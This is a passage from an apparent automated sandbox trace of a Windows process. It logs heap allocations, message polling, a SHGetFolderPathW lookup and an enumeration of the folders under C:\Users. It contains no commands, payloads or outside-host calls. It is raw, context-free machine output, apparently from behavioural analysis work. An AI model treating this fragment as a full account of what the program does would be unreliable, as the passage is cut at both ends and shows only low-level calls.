RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.511] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.511] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.511] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.511] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.512] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.512] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.512] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.512] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.512] PathFindFileNameW (pszPath="") returned="" [0165.512] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.512] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.512] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.512] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0165.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c4a8 | out: hHeap=0xcd0000) returned 1 [0165.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4a8 [0165.513] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c4a8 | out: hHeap=0xcd0000) returned 1 [0165.513] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.513] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0165.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41140 [0165.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b410f8 [0165.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b410f8 | out: hHeap=0xcd0000) returned 1 [0165.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41140 | out: hHeap=0xcd0000) returned 1 [0165.513] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0165.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0165.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0165.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0165.513] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0165.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0165.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0165.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0165.513] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0165.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608bc0 [0165.514] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.514] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0165.514] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.514] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4a8 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0165.514] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c4a8 | out: hHeap=0xcd0000) returned 1 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x498) returned 0x3b449d0 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4a8 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6b0 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c688 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c5e8 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c5c0 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c250 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2a0 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c430 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c458 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c480 [0165.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c930 [0165.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c958 [0165.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c980 [0165.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9d0 [0165.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9f8 [0165.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41140 [0165.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608bf8 [0165.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608c30 [0165.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608c68 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c548 | out: hHeap=0xcd0000) returned 1 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c520 | out: hHeap=0xcd0000) returned 1 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c4f8 | out: hHeap=0xcd0000) returned 1 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c4d0 | out: hHeap=0xcd0000) returned 1 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c278 | out: hHeap=0xcd0000) returned 1 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c2c8 | out: hHeap=0xcd0000) returned 1 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3e0 | out: hHeap=0xcd0000) returned 1 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c700 | out: hHeap=0xcd0000) returned 1 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c728 | out: hHeap=0xcd0000) returned 1 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c750 | out: hHeap=0xcd0000) returned 1 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c778 | out: hHeap=0xcd0000) returned 1 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c7a0 | out: hHeap=0xcd0000) returned 1 [0165.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c7c8 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c7f0 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c818 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c840 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c868 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c890 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8b8 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c570 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c598 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c408 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1d8 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b446b8 | out: hHeap=0xcd0000) returned 1 [0165.516] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608bc0 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0165.517] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0165.517] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.517] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.517] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.517] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.517] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.517] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.517] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.517] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.517] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.517] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.517] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.517] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.517] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.517] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.517] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.517] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.517] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.517] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.517] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.517] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.517] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.519] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.519] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.519] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.519] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.519] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b18 | out: hHeap=0xcd0000) returned 1 [0165.519] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c188 | out: hHeap=0xcd0000) returned 1 [0165.519] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c098 | out: hHeap=0xcd0000) returned 1 [0165.519] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3b9b0 | out: hHeap=0xcd0000) returned 1 [0165.519] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c2f0 | out: hHeap=0xcd0000) returned 1 [0165.519] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c318 | out: hHeap=0xcd0000) returned 1 [0165.519] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608aa8 | out: hHeap=0xcd0000) returned 1 [0165.519] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608ae0 | out: hHeap=0xcd0000) returned 1 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c340 | out: hHeap=0xcd0000) returned 1 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b410b0 | out: hHeap=0xcd0000) returned 1 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 